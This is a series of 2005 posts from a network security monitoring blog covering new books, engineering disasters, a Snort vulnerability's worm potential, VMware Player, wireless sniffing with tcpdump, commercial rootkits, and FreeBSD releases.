Shortly after I received a copy of the previous book, I learned of Jack Herrington's Podcasting Hacks. The O'Reilly Hacks series usually contain lots of good advice, but the format is seldom read cover-to-cover. It's more an assortment of helpful tips and tools.

Three books from Syngress are next. First is Sarbanes-Oxley IT Compliance Using COBIT and Open Source Tools by Christian B. Lahti and Roderick Peterson. I will admit up front that I will bail on this book unless it hooks me. I am not a regulatory compliance person, but I would like to learn a little more about SOX and COBIT. I would like this book to provide the background I need to understand these issues.

Software Piracy Exposed by Paul Craig and Ron Honick will be good if it follows in the footsteps of an earlier Syngress book, Inside the Spam Cartel. I don't know much about modern software piracy, so I thought this book might provide a glimpse into that threat sector.

Nessus, Snort, & Ethereal Power Tools:
Customizing Open Source Security Applications
by Brian Caswell, Gilbert Ramirez, Jay Beale, Noam Rathaus and Neil Archibald looks like a great book. The only existing review on Amazon.com (3 stars) complains "Very in-depth, however, not for someone who is just starting out on Snort, Nessus, or Ethereal. New to Snort, Nessus, or Ethereal - Buy something else." Does every book have to assume a newbie audience? Of course not -- state the prerequisite knowledge up front, and press on!

The Definitive Guide to MySQL 5, 3rd Ed by Michael Kofler looks like a great overview of features found in MySQL 5, which is currently a release candidate at version 5.0.13. The "generally available" version is 4.1.15, which is the one people are most likely encouraged to use in production. Once MySQL 5 leaves RC status, I plan to incorporate it into my Sguil Installation Guide, along with FreeBSD 6.0 and Sguil 0.6.0. All three components should be ready within the next several weeks.

After years of no publications about Debian, this year has seen two books about that Linux distro. First was Wiley's Debian GNU/Linux 3.1 Bible by David B. Harris, Jaldhar Vyas. Now we have No Starch's The Debian System by Martin F. Krafft. I am much more willing to devote time to a new operating system when it is backed by books. Online documentation is fine, but a published book is something I can recommend to others in a physical form. It carries much more weight (literally) than online documentation. I plan to evaluate how I might integrate Debian into my lab, although I already have it running on a PA-RISC box that normally hosts HP-UX.

Finally we arrive at Security and Usability, a collection of essays edited by Lorrie Faith Cranor and Simson Garfinkel. I think this is the sort of book I might read on a cross-US flight. I am not a big fan of collections of essays, but in a captive environment (i.e., stuck on a plane) I might find sanctuary in the ideas contained in this book.

So that's a ton of new books. My personal reading list currently shows 24 non-programming and 24 programming books on my bookshelf. That does not count reference books that I have pre-reviewed but do not plan to read cover-to-cover. My Amazon.com Wish List shows another 21 books on the horizon that appear interesting. Since I do not have any new major writing projects planned for the next year, I would like to make progress on all of this reading. Stay tuned to my Amazon.com Reviews as I read and review the titles seen here and elsewhere. Thank you!

Saturday, October 22, 2005

Further Thoughts on Engineering Disasters

My TiVo managed to save a few more episodes of Modern Marvels. You may remember I discussed engineering disasters last month. This episode of the show of the same title took a broader look at the problem. Three experts provided comments that resonated with me.

First, Dr. Roger McCarthy of Exponent, Inc. offered the following story about problems with the Hubble Space Telescope. When Hubble was built on earth, engineers did not sufficiently address issues with the weight of the lens on Earth and deflections caused by gravity. When Hubble was put in orbit, the lens no longer deflected and as a result it was not the proper shape. Engineers on Earth had never tested the lens because they could not figure out a way to do it.

So, they launched and hoped for the best -- only to encounter a disaster that required a $50 million orbital repair mission. Dr. McCarthy's comment was "A single test is worth a thousand expert opinions." This is an example of management by fact instead of management by belief, mentioned previously on this blog.

Second, Dr. Charles Perrow, author of Normal Accidents: Living With High-Risk Technologies, explained the makings of a disaster. Essentially, he said disasters are caused by the unforeseen consequences of multiple, individually non-devastating, failures in complex systems. Most catastrophes could be prevented if any one of the small failures had not occurred. Third, Mary Schiavo commented on the Challenger disaster. She described the well-known problems with operating the Shuttle's rocket O-rings in temperatures below 53 degrees F. The Shuttle had launched at lower temperatures prior to the Challenger explosion, but NASA knew they were risking catastrophe. Ms. Schiavo said NASA engineers begged their managers not to let Challenger launch, seeing that chunks of ice covered the launch pad and Shuttle. They were overruled and disaster occurred.

This struck a chord with me, because a few days earlier I read a new story in Time about how Steve Jobs gets Apple to bring innovative products to market:

Apple CEO Steve Jobs [will] tell you an instructive little story. Call it the Parable of the Concept Car. "Here's what you find at a lot of companies," he says, kicking back in a conference room at Apple's gleaming white Silicon Valley headquarters, which looks something like a cross between an Ivy League university and an iPod. "You know how you see a show car, and it's really cool, and then four years later you see the production car, and it sucks? And you go, What happened? They had it! They had it in the palm of their hands! They grabbed defeat from the jaws of victory!

"What happened was, the designers came up with this really great idea. Then they take it to the engineers, and the engineers go, 'Nah, we can't do that. That's impossible.' And so it gets a lot worse. Then they take it to the manufacturing people, and they go, 'We can't build that!' And it gets a lot worse."

When Jobs took up his present position at Apple in 1997, that's the situation he found. He and Jonathan Ive, head of design, came up with the original iMac, a candy-colored computer merged with a cathode-ray tube that, at the time, looked like nothing anybody had seen outside of a Jetsons cartoon. "Sure enough," Jobs recalls, "when we took it to the engineers, they said, 'Oh.' And they came up with 38 reasons. And I said, 'No, no, we're doing this.' And they said, 'Well, why?' And I said, 'Because I'm the CEO, and I think it can be done.'"


Would Steve Jobs have overruled the NASA engineers and launched Challenger? Who knows.

From what I have learned, disasters are prone to happen in complex, tightly-coupled systems. The only way to try to avoid them is to test and monitor their operation, exercise response, and then implement those plans when catastrophe occurs. Anything less is like launching a defective, untested Hubble and hoping for the best, and then paying through the nose to clean up the mess.

Here are a few footnotes to this post. Dr. McCarthy's company offers security engineering services, including services for information systems. They are described thus: "We have assembled one of the largest private collections of computerized accident and incident data in the world. Our web-based solutions put this information at your disposal, giving you comprehensive risk data quickly and at low cost." Dr. McCarthy was recently elected to the National Academy of Engineering, which has a Computer Science and Telecommunications Board with a Improving Cybersecurity Research in the United States project. My research for this story also led me to the System Safety Society.

Excellent Pf Documentation

I recently learned of Peter N. M. Hansteen's document Firewalling with OpenBSD's PF packet filter. I really like the approach Peter takes to describing Pf. He explains enabling Pf on OpenBSD, FreeBSD, and NetBSD, and then builds up the capabilities one can employ using Pf. I recommend anyone who wants to learn more about Pf start with Peter's document.

Incidentally, OpenBSD 3.8 will be available at a FTP server near you on 1 November.

The Coming Snort Worm

This week we learned via an advisory of a vulnerability in the Back Orifice preprocessor in Snort version 2.4.2, 2.4.1, and 2.4.0. The vulnerability was discovered by another ISS X-Force researcher. I bet (but have no inside knowledge) that he was following the same marching orders that Mike Lynn received: find vulnerabilities in competitors' products. Mike looked at Cisco, and Neel Mehta looked at Sourcefire's Snort.

I am sure ISS is still bitter over the Witty worm that revealed the installed ISS RealSecure and BlackIce userbase to be about 12,000 systems. The Witty worm spread via a single UDP packet with a fixed source port of 4000 UDP.

Let's consider the factors that lead me to believe that the Snort BO vulnerability will produce a worm.

  1. The new vulnerability can be exploited by a specially crafted UDP packet to or from any port other than port 31337. (Thanks to Jose Nazario for correcting me on this point.) This is similar to the UDP packet used by Witty. UDP is an ideal worm vector, as demonstrated by Slammer. There is no need for a TCP handshake, which means spoofing is much easier.

  2. Sensors need not be directly targeted. All a worm has to do is send exploit UDP traffic to a segment monitored by a vulnerable Snort sensor. The attacker need not know anything about the target's management IP address.

  3. Snort has been in the news recently as a result of its acquisition by Checkpoint. A worm coder can kill or embarrass two birds with one UDP stone.

  4. Snort is everywhere -- .com, .net, .org, .edu, .gov, etc. 0wning a .mil or .gov Snort sensor gives intruders the ultimate vantage point over a monitored network. I imagine sophisticated intruders have already compromised a slew of sensitive Snort sensors, but at some point a lower life form will decide to turn the exploit into a worm.

  5. Snort source code is available, so comparing 2.4.0-2.4.2 with 2.4.3 means the vulnerability can be quickly identified.


I can imagine a few factors that will reduce the likelihood of a worm.

  1. The vulnerability reportedly exists in Snort versions 2.4.0 through 2.4.2. That's a narrow set of versions, given Snort 2.4.0 was released in July. I have heard of users running Snort 1.8.x and 1.9.x; they complain about rules that don't work with their versions. Argh!

  2. Snort runs on a huge number of platforms. That is one of the beauties of the program. Will a worm target Snort on Linux? If so, what distro/kernel/version/etc.? How about Snort on Windows? That would make the most sense -- the OS would be fairly similar, and the user base would make for good targets. We'll see.

  3. Sophisticated intruders will keep any exploit to themselves. They may try to keep it out of the hands of the bottom feeders.


What do you think? Will we see a Snort worm? I'm keeping an eye on FrSIRT.

On a related note, be sure to upgrade to Ethereal 0.10.13 -- 0.10.12 has bugs too.

Friday, October 21, 2005

VMware Player Changes Everything

In the words of the immortal Joey -- "whoa." I just learned of, and tried, the new VMware Player. If you haven't heard of it yet, VMware player is a free program for Windows and Linux users that allows them to run a single VM on their host OS. VMware Player is like a stripped down version of VMware Workstation. It does not support snapshots, and the documentation says only one VM can run at a time (despite what the comparison chart implies).

This changes everything. Everyone who is an end user of VMs (not a creator) just saved $189 for a VMware Workstation license. This includes students who use VMware on their class desktops or laptops. Authors can now distribute VMs with books (like a second edition of Real Digital Forensics?) and have readers access those VMs with the free VMware Player.

I tried one of the freely available images in the Virtual Machine Center -- the Browser-Appliance. As you can see from the screen shot below, it's an Ubuntu Linux distro.

I have not tried any of the innovative hacks involving VM files, but I would like to evaluate them. I'm considering building VM of a complete Sguil installation using FreeBSD 6.0 and Sguil 0.6.0 when available. This approach easily avoids the problems with building and maintaining live CDs!

I applaud VMware for providing this free no-cost program. It is obviously an attempt to build market share and direct attention away from Microsoft's product. (The two were compared in a recent NWC review.)

How do you plan to use VMware Player?

VirtualWiFi and Monitoring

While teaching Network Security Operations last week, I presented material on monitoring wireless networks. Sample syntax follows:

orr:/root# ifconfig wi0 mediaopt monitor channel 6 up
orr:/root# tcpdump -i wi0 -L
Data link types (use option -y to set):
EN10MB (Ethernet)
IEEE802_11 (802.11)
IEEE802_11_RADIO (802.11 plus BSD radio information
header)
orr:/root# tcpdump -n -i wi0 -y IEEE802_11

One of the students asked if Tcpdump supported hopping across channels to monitor multiple networks simultaneously. I did not know of a way to do this, because the channel to monitor must be specified as shown above. An alternative requires running multiple wireless NICs.

I just learned of Microsoft's VirtualWiFi research project. This is continuation of Ranveer Chandra's work on MultiNet. If VirtualWiFi supports putting a wireless NIC into monitor mode on Windows, it is possible to virtualize the NIC for as many channels as one wishes to monitor. Separate WinDump instances could sniff each virtual NIC. If anyone wishes to try this, please share your results in a comment.

Commercial Rootkits Make NSM Even More Relevant

Last month I posted Rootkits Make NSM More Relevant Than Ever. A few weeks ago I spoke at a Cisco training event attended by over 400 sales engineers and broadcast to several hundred more. I built my presentation on the "NSM, Now More Than Ever" theme. Since Cisco is a network infrastructure company, my message resonated with them. I would have delivered the same message to Microsoft if asked, but I am not a 31337 BlueHat h@x0r.

Today I learned through Tom Sanders' story Rootkit creators turn professional about Golden Hacker Defender (GHD). GHD is a modification of the freely available Windows userland rootkit Hacker Defender (HD) by holy_father. Buyers can customize HD to suit their needs, which usually involves evading detection.

For example, the ultimate form of HD is listed as Brilliant Hacker Defender Forever, shown in the following screen capture. The cost is 900 Euro, or 1,077.09 USD at today's rates.

nti-virus company F-Secure brought this product to light in a recent blog posting. F-Secure's BlackLight product tries to detect rootkits; alternatives include RootkitRevealer by SysInternals and Microsoft's Strider Ghostbuster.

Blogger PABlo promises more coverage on rootkits, which I intend to follow.

Monday, October 17, 2005

Useful Nmap Documentation

Today Slashdot notified me of an interview with Nmap author Fyodor. I found it interesting that Fyodor makes a living through Insecure.Com LLC, whose "primary business is licensing Nmap technology for inclusion in commercial products." I also learned he is working on a book on Nmap, and he "only [has] a couple chapters left to draft." Apparently the new Nmap man page is an excerpt from this book.

By reading Slashdot comments, I learned about James Messmer's online book Secrets of Network Cartography: A Comprehensive Guide to Nmap. I have not reviewed this book for technical content, but the table of contents looks interesting. Anyone who considers themselves to be a security or traffic analyst should be familiar with Nmap's workings. It is important to understand how all of the Nmap scans work and how they appear in traffic excerpts.

Sunday, October 16, 2005

Register for 20 October ISSA-NoVA Meeting by Noon Tuesday

To my DC metro area readers: if you'd like to attend the local ISSA-NoVA chapter meeting on Thursday night, please RSVP by noon Tuesday. I plan to be there to hear Paco Hope discuss FreeBSD and OpenBSD.

Friday, October 14, 2005

MySpace Worm Demonstrates NSM Principles

In my first book, the The Tao of Network Security Monitoring: Beyond Intrusion Detection, I say "some intruders are smarter than you," and "intruders are unpredictable." Because of these two facts, prevention eventually fails. In other words, intruders are cleverly figuring out ways to circumvent security of services you have never heard about in ways you could not imagine. As a result, defenses fail and monitoring is the only way to detect that failure and respond appropriately.

The story Cross-Site Scripting Worm Hits MySpace is a perfect example of these principles in action. In short, someone figured out how to create a worm on the MySpace online community. More details are posted at this Slashdot thread.

I had never heard of MySpace until today, but over a million users were affected by this worm. Did you see this coming? Of course not. There is little point in forecasting future threats. The best we can do is to implement the best preventative defenses we can, monitor everything else, and respond in a timely manner.

Thursday, October 13, 2005

Bejtlich Quotes in Sourcefire Acquisition Story

Eric B. Parizo mentioned me in his story Snort users fear future under Check Point. One of the quotes appears as follows:

Richard Bejtlich, principal with Washington, D.C.-based consultancy Tao Security, said many fail to realize just how expensive it is to support a product like Snort.

"I've been to Sourcefire, and I've seen how many people they have working on the product and on signatures," Bejtlich said. "They have what seems like millions and millions of racks of equipment. I was surprised they were able to continue with Snort as they did."


That should say "millions and millions of dollars of racks of equipment." I obviously haven't seen millions of racks of anything when I visit Sourcefire!

Also, I appear to have been demoted at my own company. I am not a "principle" at TaoSecurity. My boss must be upset with my performance! :)

Wednesday, October 12, 2005

Brief Thought on Digital Security

I was asked to write an article for an upcoming issue of Information Security Magazine based on my Engineering Disasters blog post. I had the following thought after writing that article.

When an engineering catastrophe befalls the "real" or "analog" world, it's often very visible. Failed bridges collapse, levees break, sink holes swallow buildings, and so on. If you look closely enough, prior to ultimate failure you see indications of pending doom. Cracks appear in concrete, materials swell or contract, groaning noises abound, etc.

This is generally not the case in the digital world. It is possible for an enterprise to be completely owned by unauthorized parties, without any overt signs. If one knows where to look of course, indicators can be seen, and evidence of compromise can be gathered, analyzed, and escalated. This is the reason I advocate network security monitoring (NSM) and conducting traffic threat assessments (TTAs).

Tuesday, October 11, 2005

SecurityMetrics Documents Security Cycles

Andrew Jaquith of SecurityMetrics.org posted an interesting story called Hamster Wheels of Pain. It's a follow-up to an earlier article. I think the present story is cool because Andrew collected and posted the security process "wheels" of 11 security vendors.

I recognize Foundstone's in there, shown as a thumbnail at left.

I think Andrew is a little too cynical regarding some of these process charts. Some are used to sell products, and often reflect vendor biases. Others are just ways to break the security problem down into manageable chunks.

I use the diagram at right in my classes to emphasize the traffic-centric approach I take to network security operations. Does this make me bad? I doubt it.

BSD Certification Group Publishes BSD Associate Exam Objectives

Last week the BSD Certification Group published its BSD Associate Exam Objectives (.pdf). The preface of the document explains its purpose:

"This document introduces the BSD Associate (BSDA) examination and describes in considerable detail the objectives covered by the exam. The exam covers material across all four major projects of BSD Unix - NetBSD, FreeBSD, OpenBSD and DragonFly BSD.

While the testing candidate is expected to know concepts and practical details from all four main projects, it is not necessary to know all the details of each one. A thorough reading of this document is recommended to understand which concepts and practical details are expected to be mastered.

Throughout this document, a clear distinction is placed on 'recognizing' and 'understanding', versus 'demonstrating' and 'performing'. Certain objectives call for the mere understanding of certain topics, while others call for the ability to demonstrate performance level knowledge of the topic...

Successful mastery of the BSDA examination will, in most cases, require study and practice. The requirements for the exam encompass more background in BSD than is common among casual users or those new to BSD. This is a deliberate decision by the BSD Certification Group- to encourage more cross learning among BSD systems so that breadth of understanding of BSD is as heavily tasked as depth of understanding. The result will be a more well-rounded BSD advocate and a more knowledgeable system administrator."

The objectives describe seven domains:

  1. Installing and Upgrading the OS and Software

  2. Securing the OS

  3. Files, Filesystems, and Disks

  4. Users and Accounts Management

  5. Basic System Administration

  6. Network Administration

  7. Basic Unix Skills


Inside the document describes the audience for the certification:

"The BSDA certification is designed to be an entry-level certification on BSD Unix systems administration. Testing candidates with a general Unix background, but less than six months of work experience as a BSD systems administrator (or who wish to obtain employment as a BSD systems administrator) will benefit most from this certification."

Also:

"[T]he SDA certification is only valid for 5 years. Existing BSDAs who wish to maintain their certification will need to recertify every 5 years. Details on how to recertify will be publicly available in a document to be published in 2006."


I like this approach. I disagree that DragonFly BSD should be included, since something like 2% of all BSD administrators use DragonFly.

The guide is 57 pages long, so I will need time to read everything. At first glance it looks like great work.

Although I am still listed on the about us page, I have requested resignation as I have absolutely no time to work on the project while running TaoSecurity.

FreeBSD 6.0-RC1 Available

I just read the announcement that FreeBSD 6.0-RC1 is available for download. There's a helpful link on the new front page that directly points to places to find the new release candidate. The 6.0 schedule does not list a release date, but the RC candidate announcement says RC1 will be the only release candidate. I expect to see 6.0-RELEASE arrive within the next two weeks. Great work FreeBSD release engineering team!

FreeBSD 5.5, at least one more upgrade to the existing 5.x tree, is scheduled for arrival in November. According to the security advisory schedule, FreeBSD 4.11 will enter end-of-life status on 31 January 2007. After that date no security fixes for the 4.x tree will be officially provided. Support for the 5.x tree will end earlier, 31 May 2006. I believe the FreeBSD team is trying to encourage 5.x users to migrate, and leave a window open for people who have been running 4.x for years.

TaoSecurity Blog on CNET Blog 100

I received word today that this blog was added to the CNET News.com Blog 100 list. My site is described as a "good aggregation of information on a wide range of security issues. Detailed and authoritative, with many updates." I've been really busy preparing, teaching and speaking the last several weeks, but I expect to return to my normal blogging pace late next week. Thanks CNET!

Saturday, October 08, 2005

New FreeBSD Web Site Launched

I like the look of the new FreeBSD home page, but the daemon in the middle looks obnoxiously large compared to the rest of the content. I'd much rather see Beastie small and somewhere else, preferably in a corner or on the community page. FreeBSD is an operating system for professionals; I'd like to see it treated seriously for once. On a related note, I found this interview with Scott Long very interesting.

Thoughts on the Week's Security News

This was a busy week for me; I spent all week teaching (and all last week preparing) a private Network Security Operations class in California. I just flew back from LAX to Dulles this morning and I get on another plane tomorrow afternoon. I'm speaking in San Jose at a Cisco event, and then teaching a second private NSO class again next week.

I've been tracking all of the week's security news. Thank you to those who thought I may have missed something. I didn't want to commit any thoughts to the blog without taking some time to ponder various events. Obviously the biggest news of the week was Checkpoint's $225 million acquisition of Sourcefire.

In short, I didn't see that coming. I have doubts about the future of Snort being a free product, let alone open source. I don't see anyone making the case to the board of a publicly traded company that part of that company's work is going to be given away for free, especially after spending $225 million for it.

You may have seen how Checkpoint is treating users of the free version of Zonealarm, which was purchased by Checkpoint two years ago for $225 million. Sure, the basic Zonealarm firewall is still free, but Checkpoint will not provide a patch for a new security problem. Checkpoint claims the problem has low severity even though proof of concept code exists. To quote John LaCour, director of security services: "It is a theoretical attack that we don't see used in the real world." Great. That rationale has certainly stood the test of time (not).

However, I do not fault Sourcefire at all for being purchased. I never faulted them for the way they handled the new rules licensing, either. The amount of manpower and resources they devote to Snort is incredible, so I am happy to see them be rewarded. I am just not sure Checkpoint is the right fit, at least from where I stand. What are your thoughts?

Saturday, October 01, 2005

Real Digital Forensics and Shirts

This week I received a batch of TaoSecurity T-shirts for my Network Security Operations class. The back of the T-shirt is pictured at left. The front of the T-shirt shows the TaoSecurity logo.


I also received my copy of our new book Real Digital Forensics, also pictured at right. You can visit the pubisher Addison-Wesley to review the table of contents, the preface, and also download the first chapter. It's a review of Windows live response.

I think you will really enjoy this book. I wrote with Keith Jones and Curtis Rose from Red Cliff Consulting. The project was two, almost three years in the making. In the book we look at intrusions from the perspective of the file system, memory, and network activity. (Guess who handled the network side?) :) All of the evidence we analyze is included on a DVD shipped with the book.
You can get a better look at the cover in the photo at left. In addition to TaoSecurity T-shirts for my class students, I'm making TaoSecurity polo shirts. I wear these consulting. Several people have asked if I will sell the T-shirts and polo shirts. I'm not promising anything, but if you're interested please post a comment. Incidentally I'm not using Cafe Press; I found a good local dealer who has been providing excellent quality shirts.

Comment Verification Activated

Some idiot's comment spam bot posted over 70 "comments" to this blog last night. I am working my way through deleting them all. This is the latest salvo in an escalating battle which starting which intermittent spam comments several months ago. To try to reduce these automated attacks in the future, I've enabled comment verification. I hope it is not too onerous for those making legitimate comments. Thank you.